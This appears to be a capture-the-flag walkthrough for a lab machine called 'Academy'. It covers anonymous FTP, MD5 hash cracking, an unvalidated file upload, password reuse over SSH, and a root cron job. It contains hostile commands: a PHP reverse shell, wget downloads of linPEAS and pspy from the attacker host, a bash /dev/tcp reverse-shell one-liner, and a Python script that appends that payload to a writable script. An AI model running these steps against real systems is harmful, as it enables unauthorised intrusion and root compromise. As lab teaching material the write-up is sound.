Academy

Root the target system through its exposed services (anonymous FTP, a vulnerable web application, SSH with a reused password, and a root cron job).

By Ren Sie

Enumeration

Nmap

An Nmap scan of the target shows an FTP service (vsftpd 3.0.3) that allows anonymous login and exposes a single file, plus an Apache default page on port 80:

Target Scanning Result
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP File Retrieve

The anonymous FTP share contains a file named note.txt (owned by uid 1000, which /etc/passwd later maps to the user grimmie). Retrieve it and read it for clues:

1. $ ftp <Target_IP_Address>
2. Name (192.168.182.158:ren): anonymous
3. Password: <Blank and hit Enter>
4. ftp> get note.txt

Hello Heath !
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.
I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`Student Regno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES ('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '7.60', '2021-05-29 14:36:56');

The VALUES clause contains the new student's password hash, cd73502828457d15655bbd7a63fb0bc8, stored next to the registration number 10201321. It is 32 hexadecimal characters with no visible salt, which hash-identifier (or hashid) reports as most likely MD5; that corresponds to Hashcat mode 0 (raw MD5). Crack it against rockyou:

hashcat -m 0 cd73502828457d15655bbd7a63fb0bc8 /usr/share/wordlists/rockyou.txt

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs
cd73502828457d15655bbd7a63fb0bc8:student
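The identify-then-crack step above, written out as an added Python example (not part of the original walkthrough and not what hashcat does internally). The hash is the one from note.txt; the wordlist is a constructed five-word stand-in for rockyou.txt, and the length-to-algorithm table is a heuristic, which is why the crack step verifies every guess rather than trusting the identification:

```python
import hashlib
import re

# The hash lifted from note.txt on the target.
NOTE_HASH = "cd73502828457d15655bbd7a63fb0bc8"

# Constructed stand-in for rockyou.txt (assumption: a few plausible guesses).
SAMPLE_WORDLIST = ["password", "academy", "grimmie", "student", "letmein"]

# Hex digest length -> (hashlib algorithm, hashcat -m mode).
# Length alone is a heuristic: an unsalted MD5 and an NTLM hash are both
# 32 hex characters, so the crack step below still verifies each guess.
BY_LENGTH = {
    32: ("md5", 0),
    40: ("sha1", 100),
    64: ("sha256", 1400),
    128: ("sha512", 1700),
}


def identify(hash_hex):
    """Return (algorithm, hashcat mode) for a bare hex digest, or None."""
    if not re.fullmatch(r"[0-9a-fA-F]+", hash_hex):
        return None  # salted/encoded formats (e.g. $1$...) are out of scope
    return BY_LENGTH.get(len(hash_hex))


def digest(algo, word):
    """Unsalted hex digest of a candidate password."""
    return hashlib.new(algo, word.encode()).hexdigest()


def crack(hash_hex, wordlist):
    """Dictionary attack on an unsalted digest; returns the plaintext or None."""
    ident = identify(hash_hex)
    if ident is None:
        return None
    algo, _mode = ident
    target = hash_hex.lower()
    for word in wordlist:
        if digest(algo, word) == target:
            return word
    return None


if __name__ == "__main__":
    print(identify(NOTE_HASH))               # ('md5', 0)
    print(crack(NOTE_HASH, SAMPLE_WORDLIST))  # student
```

Against a real wordlist the Python loop is orders of magnitude slower than hashcat, which is the point of handing the job to hashcat once the type is known; the script is only meant to make the two steps (identify, then verify by recomputation) explicit.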

HTTP Directory Brute-Force

Any of these three tools will enumerate directories and files under the web root (the default Apache page itself reveals nothing):

 1. ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://<Target_IP_Address>/FUZZ
 2. dirb http://<Target_IP_Address>
 3. dirbuster (the one used here)

Using DirBuster, we discovered:

  • a phpMyAdmin login portal (/phpmyadmin/index.php).
  • the target web application with a student login and an admin panel (/academy).

We logged in successfully with both the student credentials recovered from note.txt (registration number plus the cracked password) and a default-credential guess for the admin panel:

  1. 10201321:student
  2. admin:admin

In the student session there is an option to upload a profile picture, and the upload accepts files that are not images at all.

Exploitation

HTTP - PHP reverse shell

Because the profile-picture upload found during enumeration does not validate the file type, we can upload a PHP reverse shell and have Apache execute it for us.

  1. On the attack machine, start a Netcat listener:
    $ sudo nc -nvlp 1234

  2. Upload the PHP reverse shell (with the attacker IP and port 1234 set inside it) as the student's profile picture, then request the uploaded file so the server executes it. The listener receives the callback:

    connect to [192.168.182.135] from (UNKNOWN) [192.168.182.158] 37312
    Linux academy 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
     01:28:49 up  1:00,  1 user,  load average: 0.70, 0.35, 0.25
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    root     tty1     -                00:29    55:45  0.26s  0.24s -bash
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ whoami
    www-data
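The check the upload handler is missing, shown as an added Python example for contrast (this is not the Academy application's PHP code, only an illustration of the same logic). The sample PNG and PHP blobs are constructed; the client-supplied file name and Content-Type header are both attacker-controlled, so the hardened check keys on the bytes and an extension allow-list, and the stored name is regenerated server-side:

```python
import os
import secrets

# Constructed sample uploads: a minimal PNG prefix, and the opening of a PHP
# reverse shell (the body is irrelevant to the check).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLE_PNG = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
SAMPLE_PHP = b"<?php $sock=fsockopen('192.168.182.135',1234); ?>"

# Allowed extensions and the magic bytes each must start with.
ALLOWED = {
    ".png": [PNG_MAGIC],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}


def observed_accepts(filename, data):
    """Behaviour seen on the box: anything is stored as a 'photo'."""
    return True


def hardened_accepts(filename, data):
    """Accept only if the extension is allow-listed AND the bytes carry
    matching magic. shell.php, shell.phtml and photo.png.php all fail on
    the extension; a PHP file renamed to .png fails on the magic bytes."""
    ext = os.path.splitext(filename.lower())[1]
    magics = ALLOWED.get(ext)
    if magics is None:
        return False
    return any(data.startswith(m) for m in magics)


def stored_name(filename):
    """Never keep the client's name. A polyglot such as shell.php.png (real PNG
    header, PHP appended) still passes hardened_accepts, so the defence is that
    the stored file keeps only a random basename plus the allow-listed
    extension: nothing in the name can make Apache hand it to mod_php."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, data in [("shell.php", SAMPLE_PHP), ("photo.png", SAMPLE_PNG),
                       ("photo.png", SAMPLE_PHP), ("shell.php.png", SAMPLE_PNG)]:
        print(name, observed_accepts(name, data), hardened_accepts(name, data))
    print(stored_name("shell.php.png"))
```

Storing the file outside the web root (or in a directory where PHP execution is disabled) closes the remaining gap for polyglots, since the content check alone cannot tell a PNG from a PNG with PHP appended.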

LinPEAS over HTTP

Serve linPEAS from the attack machine over HTTP and fetch it from the PHP reverse shell session:

1. $ sudo python3 -m http.server 80
 # Run on the attack machine from the directory holding linpeas.sh (binding port 80 needs root; any high port such as 8000 works if the URL below is adjusted)
2. $ cd /tmp && wget http://<Attack_Machine_IP>/linpeas.sh
 # Run in the reverse shell; /tmp is writable by www-data
3. $ chmod +x linpeas.sh
 # Make it executable, otherwise ./linpeas.sh will not run (bash linpeas.sh also works)
4. $ ./linpeas.sh

LinPEAS Scanning Result

  1. Kernel and distribution version (linPEAS flags it as a kernel-exploit candidate; it was not needed on this box)

    Operative system
    https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
    Linux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8 Debian 4.19.181-1 (2021-03-19)
    Distributor ID: Debian
    Description: GNU/Linux 10 (buster)
    Release: 10
    Codename: buster

  2. Cron entries, including /home/grimmie/backup.sh

    SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    17 * * * * root cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-p
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-p

    * * * * * /home/grimmie/backup.sh

  3. /var/www/html/academy/includes/config.php

    The MySQL credentials sit in the application's config.php ($mysql_password = "My_V3ryS3cur3_P4ss"). Tested against phpmyadmin/index.php, they are valid. Keep note.txt in mind here: it said Grimmie reuses the same password everywhere.

    Searching passwords in config PHP files
    /usr/share/phpmyadmin/config.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
    /usr/share/phpmyadmin/config.sample.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
    /usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
    /usr/share/phpmyadmin/libraries/config.default.php:$cfg['ShowChgPassword'] = true;
    /var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
    /var/www/html/academy/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";

  4. cat /etc/passwd

    mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
    ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
    grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash

SSH

Nmap enumeration also showed SSH running on the target (not included in the excerpt above). The /etc/passwd entry lists grimmie as the only regular user (uid 1000, GECOS "administrator", shell /bin/bash), and note.txt warned that Grimmie reuses passwords, so the MySQL password from config.php is the obvious candidate for SSH.

  1. Log in via SSH as grimmie with the reused password
    $ ssh grimmie@<Target_IP_Address> # Password: My_V3ryS3cur3_P4ss

  2. Once in, inspect the previously identified /home/grimmie/backup.sh. The script itself is simple: it re-creates /tmp/backup.zip from the application's includes directory (the one holding config.php) and restricts the archive to its owner. What matters is not its content but who runs it, and when:

    #!/bin/bash

    rm /tmp/backup.zip
    zip -r /tmp/backup.zip /var/www/html/academy/includes
    chmod 700 /tmp/backup.zip

Note: backup.sh does not appear in /etc/crontab or in grimmie's own crontab (crontab -l). A root-owned per-user crontab is not readable by an unprivileged user, so from here we cannot see who runs the script or how often; pspy answers that without needing root.

Pspy - Scheduled Process Discovery

Download pspy64 (the static 64-bit build) into the directory the attacker's HTTP server is serving, fetch it from the SSH session (or the reverse shell), and run it. pspy polls procfs and reports processes started by other users, which exposes root's cron jobs:

1. $ sudo python3 -m http.server 80
 # On the attack machine
2. $ wget http://<Attack_Machine_IP>/pspy64
3. $ chmod +x pspy64
4. $ ./pspy64

2025/07/24 02:27:01 CMD: UID=0 PID=15914 | /usr/sbin/CRON -f
2025/07/24 02:27:01 CMD: UID=0 PID=15915 | /usr/sbin/CRON -f
2025/07/24 02:27:01 CMD: UID=0 PID=15916 | /bin/sh -c /home/grimmie/backup.sh
2025/07/24 02:27:01 CMD: UID=0 PID=15917 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:27:01 CMD: UID=0 PID=15919 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:27:01 CMD: UID=0 PID=15920 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15921 | /usr/sbin/CRON -f
2025/07/24 02:28:01 CMD: UID=0 PID=15922 | /usr/sbin/CRON -f
2025/07/24 02:28:01 CMD: UID=0 PID=15923 | /bin/sh -c /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15924 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15925 | /bin/bash /home/grimmie/backup.sh

Privilege Escalation

pspy shows root (UID=0) running /home/grimmie/backup.sh once a minute, via /bin/bash, and the script lives in grimmie's home directory where grimmie can edit it. Inserting a one-line bash reverse shell into backup.sh therefore yields a root shell within a minute.

1. $ nc -nvlp 8080
 # Set up the listener on the attack machine first, so the next cron run has something to connect back to
2. grimmie@academy:~$ nano backup.sh
 # Replace the contents with `bash -i >& /dev/tcp/<Attacker_IP_Address>/8080 0>&1`. Appending that line instead (echo '...' >> backup.sh) keeps the original backup job working, which is less disruptive on a real engagement. /dev/tcp is a bash feature; that is fine here because cron invokes the script with /bin/bash, as pspy showed.

Once the cron job fires, the listener receives a root shell:

connect to [192.168.182.135] from (UNKNOWN) [192.168.182.158] 48488
bash: cannot set terminal process group (16113): Inappropriate ioctl for device
bash: no job control in this shell
root@academy:~# whoami
whoami root
root@academy:~# cat flag.txt
cat flag.txt
Congratz you rooted this box !
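The pspy triage and the backup.sh hijack above, combined into one added Python example (this is not the page's own tooling, and pspy itself is a Go binary). The pspy lines are a constructed copy of the output shown earlier; the attacker IP 192.168.182.135 and port 8080 are the page's; the demo script is written to a temporary file so the example runs offline instead of touching /home/grimmie/backup.sh:

```python
import os
import re
import tempfile
from datetime import datetime

# Constructed copy of the pspy output from the walkthrough.
PSPY_LOG = """\
2025/07/24 02:27:01 CMD: UID=0 PID=15914 | /usr/sbin/CRON -f
2025/07/24 02:27:01 CMD: UID=0 PID=15916 | /bin/sh -c /home/grimmie/backup.sh
2025/07/24 02:27:01 CMD: UID=0 PID=15917 | /bin/bash /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15923 | /bin/sh -c /home/grimmie/backup.sh
2025/07/24 02:28:01 CMD: UID=0 PID=15924 | /bin/bash /home/grimmie/backup.sh
"""

# The backup.sh contents shown on the page (used to build the demo file).
BACKUP_SH = (
    "#!/bin/bash\n\n"
    "rm /tmp/backup.zip\n"
    "zip -r /tmp/backup.zip /var/www/html/academy/includes\n"
    "chmod 700 /tmp/backup.zip\n"
)

LINE_RE = re.compile(r"^(\S+ \S+) CMD: UID=(\d+)\s+PID=(\d+)\s+\|\s+(.*)$")
# Paths under these prefixes are owned by root/packages; anything else run as
# UID 0 (a script in a home directory, /tmp, /opt, /var/www) deserves a look.
SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/etc/", "/lib")
TIME_FMT = "%Y/%m/%d %H:%M:%S"


def root_run_scripts(log_text):
    """Map each non-system path executed as UID 0 to the sorted timestamps at
    which pspy saw it; the timestamps recover the cron schedule."""
    seen = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(2) != "0":
            continue
        for tok in m.group(4).split():
            if tok.startswith("/") and not tok.startswith(SYSTEM_PREFIXES):
                seen.setdefault(tok, set()).add(m.group(1))
    return {path: sorted(times) for path, times in seen.items()}


def interval_seconds(timestamps):
    """Seconds between the first two distinct sightings (None if fewer than 2)."""
    if len(timestamps) < 2:
        return None
    first, second = (datetime.strptime(t, TIME_FMT) for t in timestamps[:2])
    return int((second - first).total_seconds())


def writable_by_me(path):
    """The precondition for the hijack: can the current user modify the script?"""
    return os.access(path, os.W_OK)


def append_payload(path, attacker_ip, port=8080):
    """Append (rather than overwrite) a bash reverse shell, so the original
    backup keeps working. /dev/tcp requires bash; pspy showed cron running
    the script with /bin/bash, and the shebang agrees."""
    payload = f"bash -i >& /dev/tcp/{attacker_ip}/{port} 0>&1"
    with open(path, "a") as f:
        f.write(payload + "\n")
    return payload


def make_demo_script():
    """Write the page's backup.sh to a temp file (assumption: stand-in target)."""
    fd, path = tempfile.mkstemp(suffix=".sh")
    with os.fdopen(fd, "w") as f:
        f.write(BACKUP_SH)
    return path


def read_lines(path):
    with open(path) as f:
        return f.read().splitlines()


if __name__ == "__main__":
    found = root_run_scripts(PSPY_LOG)
    for path, times in found.items():
        print(path, "every", interval_seconds(times), "s")
    demo = make_demo_script()
    if writable_by_me(demo):
        print("appended:", append_payload(demo, "192.168.182.135"))
    print("\n".join(read_lines(demo)))
```

On the real target the path returned by root_run_scripts is /home/grimmie/backup.sh, writable_by_me is true once logged in as grimmie, and the listener must already be running before the next minute boundary, since the cron job will not retry a failed connection.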
